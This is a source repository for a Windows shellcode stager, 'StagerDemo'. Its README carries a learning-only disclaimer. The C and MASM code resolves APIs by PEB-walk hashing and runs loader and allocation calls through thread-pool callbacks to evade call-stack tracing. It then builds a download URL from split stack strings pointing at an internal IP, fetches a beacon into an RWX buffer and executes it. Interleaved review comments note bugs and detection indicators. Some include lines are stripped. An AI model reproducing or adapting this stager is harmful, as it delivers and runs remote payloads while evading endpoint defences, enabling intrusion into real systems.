├── 64BitHelper.h
├── AdjustStack.asm
├── AdjustStack.obj
├── GetProcWithHash.h
├── README.md
├── WorkCallback.asm
├── WorkCallback.obj
├── function_link_order.txt
├── function_link_order64.txt
├── main.c
├── myStager.sln
├── myStager.vcxproj
├── myStager.vcxproj.filters
└── myStager.vcxproj.user
/64BitHelper.h:
--------------------------------------------------------------------------------
1 | #if defined(_WIN64)
2 | extern VOID AlignRSP(VOID);
3 | 
/* Entry point of the x64 build: myStager.vcxproj overrides the linker entry point
   to Begin and links AdjustStack.obj, so this runs instead of the CRT start-up
   routine and no CRT state exists when ExecutePayload is reached. AlignRSP
   (AdjustStack.asm) realigns RSP and calls ExecutePayload; nothing here handles
   ExecutePayload returning. */
4 | VOID Begin(VOID)
5 | {
6 | // Call the ASM stub that will guarantee 16-byte stack alignment.
7 | // The stub will then call the ExecutePayload.
8 | AlignRSP();
9 | }
10 | #endif
--------------------------------------------------------------------------------
/AdjustStack.asm:
--------------------------------------------------------------------------------
1 | ; Author: Matthew Graeber (@mattifestation)
2 | ; License: BSD 3-Clause
3 | ; Syntax: MASM
4 | ; Build Syntax: ml64 /c /Cx AdjustStack.asm
5 | ; Output: AdjustStack.obj
6 | ; Notes: I really wanted to avoid having this external dependency but I couldn't
7 | ; come up with any other way to guarantee 16-byte stack alignment in 64-bit
8 | ; shellcode written in C.
9 | 
10 | EXTRN ExecutePayload:PROC
11 | PUBLIC AlignRSP ; Marking AlignRSP as PUBLIC allows for the function
12 | ; to be called as an extern in our C code.
13 | 
14 | _TEXT SEGMENT
15 | 
16 | ; AlignRSP is a simple call stub that ensures that the stack is 16-byte aligned prior
17 | ; to calling the entry point of the payload. This is necessary because 64-bit functions
18 | ; in Windows assume that they were called with 16-byte stack alignment. When amd64
19 | ; shellcode is executed, you can't be assured that your stack is 16-byte aligned. For example,
20 | ; if your shellcode lands with 8-byte stack alignment, any call to a Win32 function will likely
21 | ; crash upon calling any ASM instruction that utilizes XMM registers (which require 16-byte)
22 | ; alignment.
23 | 
; RSI is non-volatile under the x64 calling convention, which is why it is the
; register chosen to hold the pre-alignment RSP across the call: ExecutePayload
; must give it back unchanged, so the original stack pointer can be restored.
24 | AlignRSP PROC
25 | push rsi ; Preserve RSI since we're stomping on it
26 | mov rsi, rsp ; Save the value of RSP so it can be restored
27 | and rsp, 0FFFFFFFFFFFFFFF0h ; Align RSP to 16 bytes
28 | sub rsp, 020h ; Allocate homing space for ExecutePayload (32-byte home area the ABI requires of every caller)
29 | call ExecutePayload ; Call the entry point of the payload
30 | mov rsp, rsi ; Restore the original value of RSP
31 | pop rsi ; Restore RSI
32 | ret ; Return to caller
33 | AlignRSP ENDP
34 | 
35 | _TEXT ENDS
36 | 
37 | END
--------------------------------------------------------------------------------
/AdjustStack.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BambiZombie/StagerDemo/6c8b2487e5ec4fa338f8a876695c1af7c34aa748/AdjustStack.obj
--------------------------------------------------------------------------------
/GetProcWithHash.h:
--------------------------------------------------------------------------------
// Review: the two header names after #include appear to have been stripped when this
// page was rendered (angle-bracket content lost); the code below uses Windows SDK
// types (PPEB, UNICODE_STRING, LIST_ENTRY, IMAGE_NT_HEADERS, IMAGE_EXPORT_DIRECTORY).
1 | #include
2 | #include
3 | 
4 | // This compiles to a ROR instruction
5 | // This is needed because _lrotr() is an external reference
6 | // Also, there is not a consistent compiler intrinsic to accomplish this across all three platforms.
// Review: the macro does not parenthesise its arguments and evaluates `value`
// twice. Both call sites in GetProcAddressWithHash pass a plain DWORD variable
// and a constant shift of 13, so that is harmless here; a shift of 0 or 32
// would however produce a shift by 32 bits in the second operand, which is
// undefined behaviour for a 32-bit DWORD.
7 | #define ROTR32(value, shift) (((DWORD) value >> (BYTE) shift) | ((DWORD) value << (32 - (BYTE) shift)))
8 | 
9 | // Redefine PEB structures. The structure definitions in winternl.h are incomplete.
/* Partial PEB_LDR_DATA: only the fields up to the three module lists are declared,
   which is all the walk below reads (InLoadOrderModuleList). */
10 | typedef struct _MY_PEB_LDR_DATA {
11 | ULONG Length;
12 | BOOL Initialized;
13 | PVOID SsHandle;
14 | LIST_ENTRY InLoadOrderModuleList;
15 | LIST_ENTRY InMemoryOrderModuleList;
16 | LIST_ENTRY InInitializationOrderModuleList;
17 | } MY_PEB_LDR_DATA, * PMY_PEB_LDR_DATA;
18 | 
/* Partial LDR_DATA_TABLE_ENTRY; DllBase and BaseDllName are the fields used below.
   InLoadOrderLinks being first is what makes the LIST_ENTRY-to-entry cast valid. */
19 | typedef struct _MY_LDR_DATA_TABLE_ENTRY
20 | {
21 | LIST_ENTRY InLoadOrderLinks;
22 | LIST_ENTRY InMemoryOrderLinks;
23 | LIST_ENTRY InInitializationOrderLinks;
24 | PVOID DllBase;
25 | PVOID EntryPoint;
26 | ULONG SizeOfImage;
27 | UNICODE_STRING FullDllName;
28 | UNICODE_STRING BaseDllName;
29 | } MY_LDR_DATA_TABLE_ENTRY, * PMY_LDR_DATA_TABLE_ENTRY;
30 | 
/* Resolves an export by a 32-bit hash of (module name, export name) instead of
   GetProcAddress, so the caller needs no import table and no API name strings.
   Hash: ROTR32-by-13 accumulation over the raw bytes of the module's BaseDllName
   (ASCII lower-case folded to upper-case) plus the same accumulation over the
   export's ASCII name including its terminating NUL; the two sums are added.
   Walks every module in PEB->Ldr InLoadOrder and every named export of each.
   @param dwModuleFunctionHash  combined hash to look for (callers in main.c
          pass constants and cast the result to the matching function type).
   @return the export's address (typed HMODULE but really a code pointer), or
           NULL when no loaded module has a matching export.
   Defender note: reading the PEB through the TEB self-pointer (gs:0x60 / fs:0x30)
   and parsing export tables by hand is the classic API-hashing pattern; it is a
   strong static and emulation-time indicator regardless of the hash constants. */
31 | HMODULE GetProcAddressWithHash(DWORD dwModuleFunctionHash)
32 | {
33 | PPEB PebAddress;
34 | PMY_PEB_LDR_DATA pLdr;
35 | PMY_LDR_DATA_TABLE_ENTRY pDataTableEntry;
36 | PVOID pModuleBase;
37 | PIMAGE_NT_HEADERS pNTHeader;
38 | DWORD dwExportDirRVA;
39 | PIMAGE_EXPORT_DIRECTORY pExportDir;
40 | PLIST_ENTRY pNextModule;
41 | DWORD dwNumFunctions;
42 | USHORT usOrdinalTableIndex;
43 | PDWORD pdwFunctionNameBase;
44 | PCSTR pFunctionName;
45 | UNICODE_STRING BaseDllName;
46 | DWORD dwModuleHash;
47 | DWORD dwFunctionHash;
48 | PCSTR pTempChar;
49 | DWORD i;
50 | 
/* TEB.ProcessEnvironmentBlock: offset 0x60 in the x64 TEB, 0x30 in the x86 TEB. */
51 | #if defined(_WIN64)
52 | PebAddress = (PPEB)__readgsqword(0x60);
53 | #else
54 | PebAddress = (PPEB)__readfsdword(0x30);
55 | #endif
56 | 
57 | pLdr = (PMY_PEB_LDR_DATA)PebAddress->Ldr;
58 | pNextModule = pLdr->InLoadOrderModuleList.Flink;
59 | pDataTableEntry = (PMY_LDR_DATA_TABLE_ENTRY)pNextModule;
60 | 
/* The loop has no explicit "back at the list head" test; it stops at the first
   entry whose DllBase reads as NULL. That relies on the list head inside
   PEB_LDR_DATA, overlaid as a MY_LDR_DATA_TABLE_ENTRY, having a NULL at the
   DllBase offset -- TODO confirm against the current PEB_LDR_DATA layout. */
61 | while (pDataTableEntry->DllBase != NULL)
62 | {
63 | dwModuleHash = 0;
64 | pModuleBase = pDataTableEntry->DllBase;
65 | BaseDllName = pDataTableEntry->BaseDllName;
/* No validation of e_lfanew or of the PE/NT signatures; a malformed mapped module
   would be parsed anyway. DataDirectory[0] is IMAGE_DIRECTORY_ENTRY_EXPORT. */
66 | pNTHeader = (PIMAGE_NT_HEADERS)((ULONG_PTR)pModuleBase + ((PIMAGE_DOS_HEADER)pModuleBase)->e_lfanew);
67 | dwExportDirRVA = pNTHeader->OptionalHeader.DataDirectory[0].VirtualAddress;
68 | 
69 | // Get the next loaded module entry
70 | pDataTableEntry = (PMY_LDR_DATA_TABLE_ENTRY)pDataTableEntry->InLoadOrderLinks.Flink;
71 | 
72 | // If the current module does not export any functions, move on to the next module.
73 | if (dwExportDirRVA == 0)
74 | {
75 | continue;
76 | }
77 | 
78 | // Calculate the module hash
/* MaximumLength is a byte count over the UTF-16 buffer, so the loop hashes every
   low byte and every (zero) high byte of the name, the terminator, and any slack
   up to MaximumLength. The constants in main.c assume exactly this byte sequence. */
79 | for (i = 0; i < BaseDllName.MaximumLength; i++)
80 | {
81 | pTempChar = ((PCSTR)BaseDllName.Buffer + i);
82 | 
83 | dwModuleHash = ROTR32(dwModuleHash, 13);
84 | 
/* ASCII lower-case to upper-case by subtracting 0x20 (only the lower bound is
   checked, so bytes 0x7B..0x7F would be folded too). With MSVC's default signed
   char, bytes >= 0x80 compare negative and are left untouched. */
85 | if (*pTempChar >= 0x61)
86 | {
87 | dwModuleHash += *pTempChar - 0x20;
88 | }
89 | else
90 | {
91 | dwModuleHash += *pTempChar;
92 | }
93 | }
94 | 
95 | pExportDir = (PIMAGE_EXPORT_DIRECTORY)((ULONG_PTR)pModuleBase + dwExportDirRVA);
96 | 
/* Only named exports are considered (NumberOfNames / AddressOfNames); exports
   reachable by ordinal alone are never matched. */
97 | dwNumFunctions = pExportDir->NumberOfNames;
98 | pdwFunctionNameBase = (PDWORD)((PCHAR)pModuleBase + pExportDir->AddressOfNames);
99 | 
100 | for (i = 0; i < dwNumFunctions; i++)
101 | {
102 | dwFunctionHash = 0;
/* Each AddressOfNames entry is an RVA to a NUL-terminated ASCII export name. */
103 | pFunctionName = (PCSTR)(*pdwFunctionNameBase + (ULONG_PTR)pModuleBase);
104 | pdwFunctionNameBase++;
105 | 
106 | pTempChar = pFunctionName;
107 | 
/* do/while: the terminating NUL byte is folded into the hash as well. */
108 | do
109 | {
110 | dwFunctionHash = ROTR32(dwFunctionHash, 13);
111 | dwFunctionHash += *pTempChar;
112 | pTempChar++;
113 | } while (*(pTempChar - 1) != 0);
114 | 
115 | dwFunctionHash += dwModuleHash;
116 | 
117 | if (dwFunctionHash == dwModuleFunctionHash)
118 | {
/* AddressOfNameOrdinals is a WORD table indexed by name position (2 * i);
   AddressOfFunctions is a DWORD table indexed by that ordinal (4 * ordinal).
   There is no forwarder check: if the matched export is forwarded, the returned
   RVA points at a forwarder string inside the export directory, not at code --
   TODO confirm none of the hashes used by main.c resolve to a forwarded export. */
119 | usOrdinalTableIndex = *(PUSHORT)(((ULONG_PTR)pModuleBase + pExportDir->AddressOfNameOrdinals) + (2 * i));
120 | return (HMODULE)((ULONG_PTR)pModuleBase + *(PDWORD)(((ULONG_PTR)pModuleBase + pExportDir->AddressOfFunctions) + (4 * usOrdinalTableIndex)));
121 | }
122 | }
123 | }
124 | 
125 | // All modules have been exhausted and the function was not found.
126 | return NULL;
127 | }
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # StagerDemo
2 | 一个demo
3 | https://xz.aliyun.com/t/12273
4 | 
5 | ## 免责声明
6 | 
7 | 该工具仅用于网络安全学习
8 | 
9 | 由于传播、利用此工具所提供的信息而造成的后果失,均由使用者负责,作者不为此承担任何责任。
10 | 
11 | 未经网络安全部门及相关部门允许,不得善自使用本工具进行任何攻击活动。
12 | 
13 | 该工具只用于个人学习,请勿用于非法用途,请遵守网络安全法,否则后果作者概不负责。
14 | 
--------------------------------------------------------------------------------
/WorkCallback.asm:
--------------------------------------------------------------------------------
1 | EXTRN getLoadLibraryA: PROC
2 | PUBLIC myLoadLibrary
3 | PUBLIC myNtAllocateVirtualMemory
4 | 
5 | _TEXT SEGMENT
6 | 
; Thread-pool work callback (PTP_WORK_CALLBACK: rcx = Instance, rdx = Context,
; r8 = Work). Context is the DLL name string that ExecutePayload (main.c) passes
; to TpAllocWork. The name pointer is parked in xmm3 across the call into the C
; helper getLoadLibraryA (which resolves LoadLibraryA by hash and returns it in
; rax), moved into rcx, and the routine tail-jumps to LoadLibraryA, so
; LoadLibraryA returns straight to the thread-pool worker that invoked this.
; Review: xmm3 is a volatile register under the x64 ABI, so getLoadLibraryA and
; anything it calls are free to clobber it; this relies on the compiled C code
; not touching it. No shadow space is reserved and RSP is not realigned before
; the call into C code either -- whether that is tolerated depends on what the
; compiler emits for getLoadLibraryA (TODO confirm). The xor of rdx is not
; needed by getLoadLibraryA, which takes no parameters.
7 | myLoadLibrary PROC
8 | movq xmm3, rdx
9 | xor rdx, rdx
10 | call getLoadLibraryA
11 | movq rcx, xmm3
12 | xorps xmm3, xmm3
13 | jmp rax
14 | myLoadLibrary ENDP
15 | 
; Work callback that unpacks an NTALLOCATEVIRTUALMEMORY_ARGS (main.c) from
; Context (rdx) and tail-jumps to NtAllocateVirtualMemory: the first four
; arguments go in rcx/rdx/r8/r9, the 5th and 6th are stored at [rsp+28h] and
; [rsp+30h], which is where a six-argument callee finds them when no call
; frame was pushed before the jmp. The 0/8h/10h/18h/20h offsets match the
; struct's field order on x64; 3000h is MEM_COMMIT|MEM_RESERVE.
; Review: rbx is non-volatile under the x64 ABI and is overwritten here without
; being saved, so the thread-pool worker's rbx is corrupted once the callback
; has run. The two stack stores lie above the 32-byte home area the caller
; reserved for this callback's register arguments, i.e. inside the thread-pool
; worker's own frame -- TODO confirm what lives there.
16 | myNtAllocateVirtualMemory PROC
17 | mov rbx, rdx ; backing up the struct as we are going to stomp rdx
18 | mov rax, [rbx] ; NtAllocateVirtualMemory
19 | mov rcx, [rbx + 8h] ; HANDLE ProcessHandle
20 | mov rdx, [rbx + 10h] ; PVOID *BaseAddress
21 | xor r8, r8 ; ULONG_PTR ZeroBits
22 | mov r9, [rbx + 18h] ; PSIZE_T RegionSize
23 | mov r10, [rbx + 20h] ; ULONG Protect
24 | mov [rsp+30h], r10 ; stack pointer for 6th arg
25 | mov r10, 3000h ; ULONG AllocationType
26 | mov [rsp+28h], r10 ; stack pointer for 5th arg
27 | jmp rax
28 | myNtAllocateVirtualMemory ENDP
29 | 
30 | _TEXT ENDS
31 | 
32 | END
--------------------------------------------------------------------------------
/WorkCallback.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BambiZombie/StagerDemo/6c8b2487e5ec4fa338f8a876695c1af7c34aa748/WorkCallback.obj
--------------------------------------------------------------------------------
/function_link_order.txt:
--------------------------------------------------------------------------------
1 | ExecutePayload
2 | GetProcAddressWithHash
--------------------------------------------------------------------------------
/function_link_order64.txt:
--------------------------------------------------------------------------------
1 | Begin
2 | GetProcAddressWithHash
3 | ExecutePayload
4 | myLoadLibrary
5 | getLoadLibraryA
--------------------------------------------------------------------------------
/main.c:
--------------------------------------------------------------------------------
1 | #define WIN32_LEAN_AND_MEAN
2 | #pragma warning( disable : 4201 )
3 | 
4 | #include "GetProcWithHash.h"
5 | #include "64BitHelper.h"
// Review: the header name after this #include appears to have been stripped when
// the page was rendered.
6 | #include
7 | 
8 | 
/* The function-pointer types below are for APIs that are resolved by hash
   (GetProcAddressWithHash) rather than imported. The TpAllocWork/TpPostWork
   pair runs the callbacks in WorkCallback.asm on a thread-pool thread, and
   those callbacks tail-jump into the target API, so the API sees a return
   address inside ntdll's thread-pool code rather than inside this stager --
   that is what "Bypass Stack Trace" refers to. Defender note: call-stack based
   detections should therefore not rely on the immediate return address alone. */
9 | /* Bypass Stack Trace */
10 | 
11 | typedef HMODULE(WINAPI* FN_LoadLibraryA)(
12 | _In_ LPCSTR lpLibFileName
13 | );
14 | 
15 | typedef NTSTATUS(NTAPI* FN_TpAllocWork)(
16 | _Out_ PTP_WORK* WorkReturn,
17 | _In_ PTP_WORK_CALLBACK Callback,
18 | _Inout_opt_ PVOID Context,
19 | _In_opt_ PTP_CALLBACK_ENVIRON CallbackEnviron
20 | );
21 | 
22 | typedef VOID(NTAPI* FN_TpPostWork)(
23 | _Inout_ PTP_WORK Work
24 | );
25 | 
26 | typedef VOID(NTAPI* FN_TpReleaseWork)(
27 | _Inout_ PTP_WORK Work
28 | );
29 | 
30 | typedef DWORD(WINAPI* FN_WaitForSingleObject)(
31 | _In_ HANDLE hHandle,
32 | _In_ DWORD dwMilliseconds
33 | );
34 | 
/* Argument block consumed by myNtAllocateVirtualMemory (WorkCallback.asm). The asm
   reads the fields at offsets 0, 8h, 10h, 18h and 20h, so the field order and
   x64 field sizes (five 8-byte slots, ULONG padded) must stay exactly as below. */
35 | typedef struct _NTALLOCATEVIRTUALMEMORY_ARGS {
36 | UINT_PTR pNtAllocateVirtualMemory; // pointer to NtAllocateVirtualMemory - rax
37 | HANDLE hProcess; // HANDLE ProcessHandle - rcx
38 | PVOID* address; // PVOID *BaseAddress - rdx; ULONG_PTR ZeroBits - 0 - r8
39 | PSIZE_T size; // PSIZE_T RegionSize - r9; ULONG AllocationType - MEM_RESERVE|MEM_COMMIT = 3000 - stack pointer
40 | ULONG permissions; // ULONG Protect - passed through as the 6th argument via the stack; ExecutePayload uses PAGE_READWRITE for the URL buffer and PAGE_EXECUTE_READWRITE for the beacon buffer
41 | } NTALLOCATEVIRTUALMEMORY_ARGS, * PNTALLOCATEVIRTUALMEMORY_ARGS;
42 | 
43 | 
44 | /* Stager API */
45 | 
46 | typedef int(WINAPI* FN_wsprintfA)(
47 | _Out_ LPSTR unnamedParam1,
48 | _In_ LPCSTR unnamedParam2,
49 | ...
50 | );
51 | 
52 | // typedef LPVOID(WINAPI* FN_VirtualAlloc)(
53 | // _In_opt_ LPVOID lpAddress,
54 | // _In_ SIZE_T dwSize,
55 | // _In_ DWORD flAllocationType,
56 | // _In_ DWORD flProtect
57 | // );
58 | 
59 | typedef LPVOID(WINAPI* FN_InternetOpenA)(
60 | _In_ LPCSTR lpszAgent,
61 | _In_ DWORD dwAccessType,
62 | _In_ LPCSTR lpszProxy,
63 | _In_ LPCSTR lpszProxyBypass,
64 | _In_ DWORD dwFlags
65 | );
66 | 
67 | typedef HANDLE(WINAPI* FN_InternetOpenUrlA)(
68 | _In_ LPVOID hInternet,
69 | _In_ LPCSTR lpszUrl,
70 | _In_ LPCSTR lpszHeaders,
71 | _In_ DWORD dwHeadersLength,
72 | _In_ DWORD dwFlags,
73 | _In_ DWORD_PTR dwContext
74 | );
75 | 
76 | typedef BOOL(WINAPI* FN_InternetReadFile)(
77 | _In_ LPVOID hFile,
78 | _Out_ LPVOID lpBuffer,
79 | _In_ DWORD dwNumberOfBytesToRead,
80 | _Out_ LPDWORD lpdwNumberOfBytesRead
81 | );
82 | 
83 | // typedef BOOL(WINAPI* FN_VirtualProtect)(
84 | // _In_ LPVOID lpAddress,
85 | // _In_ SIZE_T dwSize,
86 | // _In_ DWORD dlNewProtect,
87 | // _Out_ PDWORD lpflOldProtect
88 | // );
89 | 
/* Table of hash-resolved API pointers filled in by ExecutePayload; the commented
   members are leftovers of an earlier VirtualAlloc/VirtualProtect based variant. */
90 | typedef struct tagApiInterface {
91 | // FN_LoadLibraryA pfnLoadLibrary;
92 | FN_TpAllocWork pfnTpAllocWork;
93 | FN_TpPostWork pfnTpPostWork;
94 | FN_TpReleaseWork pfnTpReleaseWork;
95 | FN_WaitForSingleObject pfnWaitForSingleObject;
96 | FN_wsprintfA pfnWsprintfA;
97 | // FN_VirtualAlloc pfnVirtualAlloc;
98 | FN_InternetOpenA pfnInternetOpenA;
99 | FN_InternetOpenUrlA pfnInternetOpenUrlA;
100 | FN_InternetReadFile pfnInternetReadFile;
101 | // FN_VirtualProtect pfnVirtualProtect;
102 | }APIINTERFACE, * PAPIINTERFACE;
103 | 
104 | 
/* Called from myLoadLibrary (WorkCallback.asm, EXTRN getLoadLibraryA). Resolves
   the export whose hash is 0x0726774C (assigned to a FN_LoadLibraryA-typed
   pointer) and returns it as an integer so the asm stub can jmp to it.
   EXTERN_C keeps the symbol name unmangled to match the MASM EXTRN.
   Returns 0 when the hash is not found; the asm caller does not check for that. */
105 | EXTERN_C UINT_PTR getLoadLibraryA() {
106 | FARPROC pLoadLibraryA = (FN_LoadLibraryA)GetProcAddressWithHash(0x0726774C);
107 | return (UINT_PTR)pLoadLibraryA;
108 | }
109 | 
/* Implemented in WorkCallback.asm; declared here so they can be passed as
   PTP_WORK_CALLBACKs. */
110 | EXTERN_C VOID CALLBACK myLoadLibrary(PTP_CALLBACK_INSTANCE Instance, PVOID Context, PTP_WORK Work);
111 | EXTERN_C VOID CALLBACK myNtAllocateVirtualMemory(PTP_CALLBACK_INSTANCE
Instance, PVOID Context, PTP_WORK Work);
112 | 
113 | 
/* Stager body: linker entry point of the Win32 build, reached via Begin/AlignRSP
   on x64 (see myStager.vcxproj and 64BitHelper.h). With every API resolved by
   hash it (1) loads user32.dll and wininet.dll and (2) allocates two buffers
   with NtAllocateVirtualMemory, each through a thread-pool work item whose
   callback lives in WorkCallback.asm; then (3) after a fixed wait it builds the
   download URL from the stack fragments v1..v12, fetches it with WinINet into
   the RWX beacon buffer and calls into that buffer. All strings are built as
   stack arrays, presumably so the compiled function carries no .rdata
   references (the project also emits assembly and fixes the link order).
   Review notes -- defects the code does not handle:
   - The work items run asynchronously; the only synchronisation is the fixed
     WaitForSingleObject timeout below, and httpurl / beacon are never checked
     for NULL before use.
   - No return value of TpAllocWork, wsprintfA, InternetOpenA, InternetOpenUrlA
     or InternetReadFile is checked.
   - The read loop never compares beacon_index against allocatedbeaconsize, so
     a response larger than 0x400000 bytes is written past the allocation.
   Detection angle: PEB-walk API hashing, a private PAGE_EXECUTE_READWRITE
   allocation, a WinINet download into it and an indirect call into that region
   are each strong behavioural indicators. */
114 | VOID ExecutePayload(VOID)
115 | {
116 | APIINTERFACE ai;
117 | NTALLOCATEVIRTUALMEMORY_ARGS ntAllocateVirtualMemoryUrlArgs;
118 | NTALLOCATEVIRTUALMEMORY_ARGS ntAllocateVirtualMemoryBeaconArgs;
119 | PTP_WORK LoadUser32 = NULL;
120 | PTP_WORK LoadWininet = NULL;
121 | PTP_WORK AllocUrl = NULL;
122 | PTP_WORK AllocBeacon = NULL;
123 | LPVOID httpurl = NULL;
124 | LPVOID beacon = NULL;
/* 0x30 bytes for the URL (NtAllocateVirtualMemory rounds the region up to a page)
   and 4 MiB for the downloaded stage; both are filled in by the callbacks. */
125 | SIZE_T allocatedurlsize = 0x30;
126 | SIZE_T allocatedbeaconsize = 0x400000;
127 | // DWORD dwOldProtect;
128 | 
/* recv_tmp is handed to InternetReadFile as a PDWORD; int and DWORD are both
   4 bytes on Windows, so the cast is only a signedness mismatch. */
129 | int recv_tmp = 0, recv_tot = 0;
130 | char* beacon_index = NULL;
131 | 
/* DLL names as stack arrays; their addresses are passed as Context to the
   asynchronous myLoadLibrary callbacks and stay valid because this frame lives
   until the end of the function. */
132 | char szWininet[] = { 'w', 'i', 'n', 'i', 'n', 'e', 't', '.', 'd', 'l', 'l', 0 };
133 | char szUser32[] = { 'u','s','e','r','3','2','.','d','l','l', 0 };
134 | 
/* URL fragments; v1..v7 hold 27 characters in total, v8..v12 are empty padding. */
135 | char v1[] = { 'h','t','t','p', 0 };
136 | char v2[] = { ':','/','/','1', 0 };
137 | char v3[] = { '9','2','.','1', 0 };
138 | char v4[] = { '6','8','.','2', 0 };
139 | char v5[] = { '0','6','.','1', 0 };
140 | char v6[] = { '2','9','/','F', 0 };
141 | char v7[] = { 'M','s','W', 0, 0 };
142 | char v8[] = { 0, 0, 0, 0, 0 };
143 | char v9[] = { 0, 0, 0, 0, 0 };
144 | char v10[] = { 0, 0, 0, 0, 0 };
145 | char v11[] = { 0, 0, 0, 0, 0 };
146 | char v12[] = { 0, 0, 0, 0, 0 };
147 | 
/* Twelve "%s" specifiers, one per fragment above. */
148 | BYTE format[] = { '%','s','%','s','%','s','%','s','%','s','%','s','%','s','%','s','%','s','%','s','%','s','%','s',0 };
149 | 
/* C4055 is the data-pointer to function-pointer cast warning; the return type of
   GetProcAddressWithHash is HMODULE, hence the casts. */
150 | #pragma warning( push )
151 | #pragma warning( disable : 4055 )
152 | ai.pfnTpAllocWork = (FN_TpAllocWork)GetProcAddressWithHash(0x0E5DB99D);
153 | ai.pfnTpPostWork = (FN_TpPostWork)GetProcAddressWithHash(0x71C731FF);
154 | ai.pfnTpReleaseWork = (FN_TpReleaseWork)GetProcAddressWithHash(0x716B173C);
155 | ai.pfnWaitForSingleObject = (FN_WaitForSingleObject)GetProcAddressWithHash(0x601D8708);
156 | #pragma warning( pop )
157 | 
/* Each load/allocate step is: allocate a work item, post it, release it. Release
   only drops the reference; the item still executes, but nothing below waits for
   it to finish. */
158 | /* Load User32.dll */
159 | ai.pfnTpAllocWork(&LoadUser32, (PTP_WORK_CALLBACK)myLoadLibrary, (PVOID)szUser32, NULL);
160 | ai.pfnTpPostWork(LoadUser32);
161 | ai.pfnTpReleaseWork(LoadUser32);
162 | 
163 | /* Load Wininet.dll */
164 | ai.pfnTpAllocWork(&LoadWininet, (PTP_WORK_CALLBACK)myLoadLibrary, (PVOID)szWininet, NULL);
165 | ai.pfnTpPostWork(LoadWininet);
166 | ai.pfnTpReleaseWork(LoadWininet);
167 | 
168 | /* Allocate Memory For URL */
169 | ntAllocateVirtualMemoryUrlArgs.pNtAllocateVirtualMemory = (UINT_PTR)GetProcAddressWithHash(0x9488B12D);
/* (HANDLE)-1 is the current-process pseudo-handle. */
170 | ntAllocateVirtualMemoryUrlArgs.hProcess = (HANDLE)-1;
171 | ntAllocateVirtualMemoryUrlArgs.address = &httpurl;
172 | ntAllocateVirtualMemoryUrlArgs.size = &allocatedurlsize;
173 | ntAllocateVirtualMemoryUrlArgs.permissions = PAGE_READWRITE;
174 | 
175 | ai.pfnTpAllocWork(&AllocUrl, (PTP_WORK_CALLBACK)myNtAllocateVirtualMemory, &ntAllocateVirtualMemoryUrlArgs, NULL);
176 | ai.pfnTpPostWork(AllocUrl);
177 | ai.pfnTpReleaseWork(AllocUrl);
178 | 
179 | /* Allocate Memory For Beacon */
180 | ntAllocateVirtualMemoryBeaconArgs.pNtAllocateVirtualMemory = (UINT_PTR)GetProcAddressWithHash(0x9488B12D);
181 | ntAllocateVirtualMemoryBeaconArgs.hProcess = (HANDLE)-1;
182 | ntAllocateVirtualMemoryBeaconArgs.address = &beacon;
183 | ntAllocateVirtualMemoryBeaconArgs.size = &allocatedbeaconsize;
/* RWX from the start: the download is written and executed in the same region
   with no later protection change (the VirtualProtect path is commented out). */
184 | ntAllocateVirtualMemoryBeaconArgs.permissions = PAGE_EXECUTE_READWRITE;
185 | 
186 | ai.pfnTpAllocWork(&AllocBeacon, (PTP_WORK_CALLBACK)myNtAllocateVirtualMemory, &ntAllocateVirtualMemoryBeaconArgs, NULL);
187 | ai.pfnTpPostWork(AllocBeacon);
188 | ai.pfnTpReleaseWork(AllocBeacon);
189 | 
/* The current-process pseudo-handle is never signalled while the process runs,
   so this is a 0x1000 ms (about 4 s) sleep standing in for a real wait on the
   four work items; if they have not completed by then, httpurl and beacon are
   still NULL below. */
190 | ai.pfnWaitForSingleObject((HANDLE)-1, 0x1000);
191 | 
/* wininet exports can only be resolved after the myLoadLibrary item for
   wininet.dll has run, which is why these lookups sit after the wait. */
192 | #pragma warning( push )
193 | #pragma warning( disable : 4055 )
194 | ai.pfnWsprintfA = (FN_wsprintfA)GetProcAddressWithHash(0xD0EB608D);
195 | // ai.pfnVirtualAlloc = (FN_VirtualAlloc)GetProcAddressWithHash(0xE553A458);
196 | ai.pfnInternetOpenA = (FN_InternetOpenA)GetProcAddressWithHash(0xA779563A);
197 | ai.pfnInternetOpenUrlA = (FN_InternetOpenUrlA)GetProcAddressWithHash(0xF07A8777);
198 | ai.pfnInternetReadFile = (FN_InternetReadFile)GetProcAddressWithHash(0xE2899612);
199 | // ai.pfnVirtualProtect = (FN_VirtualProtect)GetProcAddressWithHash(0xC38AE110);
200 | #pragma warning( pop )
201 | 
202 | // char* HttpURL = (char*)ai.pfnVirtualAlloc(0, 48, MEM_COMMIT, PAGE_READWRITE);
/* Concatenates v1..v12 into httpurl: 27 characters plus NUL, within the 0x30-byte
   buffer. Writes through a NULL httpurl if the allocation item has not run. */
203 | ai.pfnWsprintfA(httpurl, (char*)format, v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12);
/* No user agent, dwAccessType 0 (INTERNET_OPEN_TYPE_PRECONFIG); 0x80000000 is
   INTERNET_FLAG_RELOAD. Neither handle is checked for NULL. */
204 | LPVOID hInternet = ai.pfnInternetOpenA(0, 0, NULL, 0, NULL);
205 | HANDLE hInternetOpenUrl = ai.pfnInternetOpenUrlA(hInternet, httpurl, NULL, 0, 0x80000000, 0);
206 | // LPVOID addr = ai.pfnVirtualAlloc(0, 0x400000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
207 | 
208 | recv_tmp = 1;
209 | recv_tot = 0;
210 | beacon_index = beacon;
211 | 
/* Reads 8192-byte chunks until a read reports 0 bytes. The return value is ignored
   and there is no bound against allocatedbeaconsize; whether a failing call
   resets recv_tmp to 0 depends on InternetReadFile -- TODO confirm, otherwise a
   persistent failure loops with a stale count. */
212 | while (recv_tmp > 0) {
213 | ai.pfnInternetReadFile(hInternetOpenUrl, beacon_index, 8192, (PDWORD)&recv_tmp);
214 | recv_tot += recv_tmp;
215 | beacon_index += recv_tmp;
216 | }
217 | 
218 | // ai.pfnVirtualProtect(addr, 0x400000, PAGE_EXECUTE_READ, &dwOldProtect);
219 | // ((void(*)())addr)();
/* Indirect call into the RWX download buffer; recv_tot is never consulted, so a
   failed or empty transfer calls into the freshly committed (zero-filled) pages. */
220 | ((void(*)())beacon)();
221 | }
--------------------------------------------------------------------------------
/myStager.sln:
--------------------------------------------------------------------------------
1 | 
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.4.33122.133
5 | MinimumVisualStudioVersion = 10.0.40219.1
